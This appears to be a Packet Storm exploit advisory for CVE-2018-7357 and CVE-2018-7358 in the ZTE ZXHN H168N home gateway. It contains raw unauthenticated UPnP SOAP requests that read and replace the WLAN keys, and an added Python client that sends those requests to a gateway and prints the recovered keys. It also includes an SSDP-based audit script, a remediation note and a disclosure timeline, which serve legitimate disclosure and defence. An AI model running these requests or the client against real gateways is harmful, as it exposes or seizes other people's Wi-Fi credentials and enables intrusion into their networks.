
ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass

Posted Dec 11, 2018
Authored by Usman Saeed

ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.

tags | exploit, vulnerability, bypass, info disclosure
advisories | CVE-2018-7357, CVE-2018-7358
MD5 | 835798e5ebba5abb019adf55717b5e7d

[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for educational purposes; I would not be responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Hardware/Software:

Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

The WLANConfiguration service's GetSecurityKeys action returns the configured WEP keys, the WPA pre-shared key and the key passphrase, and the UPnP control URL answers it without any authentication:

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change:

The same control URL also accepts SetSecurityKeys, so any client that can reach the UPnP port can replace the WEP keys, the pre-shared key and the passphrase without authenticating:

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>

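Both requests above, reproduced as a small Python client. This is an added example and not the advisory author's code: it builds the SOAP envelope and headers for any WLANConfiguration action (laid out byte for byte like the advisory's requests, so the GetSecurityKeys body comes out at the same Content-Length of 288), sends it to the control URL from the advisory, and parses the reply. The reply format (a GetSecurityKeysResponse element carrying the same NewWEPKey0..3, NewPreSharedKey and NewKeyPassphrase arguments the Set request uses) follows the TR-064 WLANConfiguration service; the sample reply and sample fault embedded below are constructed, not captured from a device, and the default host 192.168.1.1 is a placeholder.

```python
"""Build, send and parse the unauthenticated UPnP/TR-064 SOAP calls from the
advisory. Added example, not the advisory author's code; the sample reply and
fault below are constructed, not captured from a device."""
import http.client
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVICE = "urn:dslforum-org:service:WLANConfiguration:1"
CONTROL_PATH = "/control/igd/wlanc_1_1"   # control URL from the advisory
UPNP_PORT = 52869                          # UPnP control port from the advisory

# Arguments GetSecurityKeys returns and SetSecurityKeys accepts (TR-064 names).
KEY_ARGS = ("NewWEPKey0", "NewWEPKey1", "NewWEPKey2", "NewWEPKey3",
            "NewPreSharedKey", "NewKeyPassphrase")


def build_envelope(action, args=None):
    """SOAP body laid out like the advisory's requests: XML declaration, CRLF,
    then the whole envelope on one line with no trailing newline."""
    inner = "".join(f"<{k}>{v}</{k}>" for k, v in (args or {}).items())
    return (
        '<?xml version="1.0" encoding="utf-8"?>\r\n'
        f'<s:Envelope xmlns:s="{SOAP_NS}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{SERVICE}">{inner}</u:{action}>'
        '</s:Body></s:Envelope>'
    )


def build_request(action, args=None):
    """Return (headers, body). No credential of any kind is attached: the
    device accepted these actions without authentication."""
    body = build_envelope(action, args)
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPACTION": f'"{SERVICE}#{action}"',
        "Content-Length": str(len(body.encode("utf-8"))),
        "Connection": "close",
    }
    return headers, body


def parse_response(xml_text, action):
    """Return the <action>Response arguments as a dict; raise on a SOAP Fault."""
    root = ET.fromstring(xml_text)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        raise ValueError("no SOAP Body in reply")
    resp = body.find(f"{{{SERVICE}}}{action}Response")
    if resp is None:
        fault = body.find(f"{{{SOAP_NS}}}Fault")
        raise RuntimeError("SOAP Fault" if fault is not None else "unexpected reply")
    return {child.tag: (child.text or "") for child in resp}


def call(host, action, args=None, port=UPNP_PORT, timeout=5):
    """Live call against a gateway (not exercised offline)."""
    headers, body = build_request(action, args)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", CONTROL_PATH, body=body.encode("utf-8"), headers=headers)
        resp = conn.getresponse()
        if resp.status != 200:
            raise RuntimeError(f"HTTP {resp.status} {resp.reason}")
        return parse_response(resp.read().decode("utf-8", "replace"), action)
    finally:
        conn.close()


def get_security_keys(host):
    """Finding 1: read the WLAN keys without authenticating."""
    return call(host, "GetSecurityKeys")


def set_security_keys(host, psk, passphrase, wep_keys=("", "", "", "")):
    """Finding 2: replace the WLAN keys without authenticating."""
    args = dict(zip(KEY_ARGS, (*wep_keys, psk, passphrase)))
    return call(host, "SetSecurityKeys", args)


# Constructed reply in the shape a GetSecurityKeysResponse takes; not device output.
SAMPLE_REPLY = (
    '<?xml version="1.0"?>'
    f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
    f'<u:GetSecurityKeysResponse xmlns:u="{SERVICE}">'
    '<NewWEPKey0></NewWEPKey0><NewWEPKey1></NewWEPKey1>'
    '<NewWEPKey2></NewWEPKey2><NewWEPKey3></NewWEPKey3>'
    '<NewPreSharedKey>constructed-psk</NewPreSharedKey>'
    '<NewKeyPassphrase>constructed-passphrase</NewKeyPassphrase>'
    '</u:GetSecurityKeysResponse></s:Body></s:Envelope>'
)

# Constructed SOAP Fault, the shape a patched device would be expected to answer with.
SAMPLE_FAULT = (
    f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body><s:Fault>'
    '<faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring>'
    '</s:Fault></s:Body></s:Envelope>'
)

if __name__ == "__main__":
    import sys
    # Placeholder default address; pass the gateway's LAN IP as the first argument.
    print(get_security_keys(sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"))
```

Running the script against a gateway prints the key dictionary if the device is still vulnerable; a patched or UPnP-disabled device should answer with a SOAP Fault or refuse the connection, which the client reports as an exception rather than as an empty key set.
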
[*] Solution:

The UPnP stack should not expose actions that read or modify security settings, such as GetSecurityKeys and SetSecurityKeys, to unauthenticated clients. Where a firmware fix is not available, UPnP should be disabled on the affected devices.

[*] Note:

Other actions that should not be published over UPnP are exposed as well; they are not listed in this blog post, as the remedy is the same.

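To see which actions a gateway actually publishes, rather than probing GetSecurityKeys alone, one can walk the device's UPnP descriptions: an SSDP M-SEARCH returns a LOCATION URL, the device description there lists each service's controlURL and SCPDURL, and each SCPD declares the action names. The following audit is an added example, not the advisory author's code. It uses the standard UPnP namespaces (`urn:schemas-upnp-org:device-1-0` and `urn:schemas-upnp-org:service-1-0`); the device description, SCPD and SSDP reply embedded below are constructed for illustration, and the description URL and SCPD path in them are assumptions, not values taken from an H168N.

```python
"""Discover a gateway over SSDP, walk its UPnP service descriptions and flag
actions that read or change security settings. Added example, not the advisory
author's code; the sample documents below are constructed and their URLs are
placeholders."""
import re
import socket
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

DEVICE_NS = "{urn:schemas-upnp-org:device-1-0}"
SCPD_NS = "{urn:schemas-upnp-org:service-1-0}"

# Action-name patterns that should never be reachable without authentication.
SENSITIVE = re.compile(
    r"Key|Password|Passphrase|Credential|^Set|^Add|^Delete|Reboot|Reset|Upgrade", re.I)


def parse_location(ssdp_reply):
    """Pull the LOCATION header (device description URL) out of an SSDP reply."""
    for line in ssdp_reply.decode("utf-8", "replace").split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            return value.strip()
    return None


def discover(timeout=2):
    """SSDP M-SEARCH on the local network; returns the LOCATION URLs that answered."""
    msg = ("M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
           'MAN: "ssdp:discover"\r\nMX: 1\r\nST: upnp:rootdevice\r\n\r\n').encode()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    found = set()
    try:
        sock.sendto(msg, ("239.255.255.250", 1900))
        while True:
            data, _ = sock.recvfrom(4096)
            loc = parse_location(data)
            if loc:
                found.add(loc)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return sorted(found)


def services(device_xml, base_url):
    """Return (serviceType, controlURL, SCPDURL) for every service in a device
    description, resolving relative URLs against the description's own URL."""
    root = ET.fromstring(device_xml)
    out = []
    for svc in root.iter(f"{DEVICE_NS}service"):
        stype = svc.findtext(f"{DEVICE_NS}serviceType", "")
        ctrl = urllib.parse.urljoin(base_url, svc.findtext(f"{DEVICE_NS}controlURL", ""))
        scpd = urllib.parse.urljoin(base_url, svc.findtext(f"{DEVICE_NS}SCPDURL", ""))
        out.append((stype, ctrl, scpd))
    return out


def list_actions(scpd_xml):
    """Action names declared in an SCPD (argument <name>s are deliberately skipped)."""
    root = ET.fromstring(scpd_xml)
    path = f"{SCPD_NS}actionList/{SCPD_NS}action/{SCPD_NS}name"
    return [n.text.strip() for n in root.findall(path) if n.text]


def sensitive_actions(scpd_xml):
    """Subset of the declared actions that a gateway should not expose unauthenticated."""
    return [a for a in list_actions(scpd_xml) if SENSITIVE.search(a)]


def audit(location, timeout=5):
    """Live audit: fetch the device description, then each SCPD, and report the
    sensitive actions per (serviceType, controlURL)."""
    with urllib.request.urlopen(location, timeout=timeout) as r:
        device_xml = r.read()
    report = {}
    for stype, ctrl, scpd_url in services(device_xml, location):
        with urllib.request.urlopen(scpd_url, timeout=timeout) as r:
            report[(stype, ctrl)] = sensitive_actions(r.read())
    return report


# Constructed samples; the description URL and SCPD path are placeholders.
SAMPLE_SSDP = (b"HTTP/1.1 200 OK\r\nST: upnp:rootdevice\r\n"
               b"LOCATION: http://192.168.1.1:52869/igd.xml\r\n\r\n")
SAMPLE_DEVICE = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0"><device><serviceList><service>
  <serviceType>urn:dslforum-org:service:WLANConfiguration:1</serviceType>
  <controlURL>/control/igd/wlanc_1_1</controlURL>
  <SCPDURL>/igd/wlanc_1_1.xml</SCPDURL>
</service></serviceList></device></root>"""
SAMPLE_SCPD = """<?xml version="1.0"?>
<scpd xmlns="urn:schemas-upnp-org:service-1-0"><actionList>
  <action><name>GetInfo</name></action>
  <action><name>GetSecurityKeys</name><argumentList><argument>
    <name>NewPreSharedKey</name><direction>out</direction></argument></argumentList></action>
  <action><name>SetSecurityKeys</name></action>
  <action><name>GetStatistics</name></action>
</actionList></scpd>"""

if __name__ == "__main__":
    for loc in discover():
        print(loc, audit(loc))
```

Run on the LAN, the script lists every service whose control URL accepts security-relevant actions; after the vendor patch or after disabling UPnP the gateway should either stop answering SSDP or stop declaring those actions, which makes this a quick way to confirm that the solution above has actually taken effect.
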
[+] Responsible Disclosure:

Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE-2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close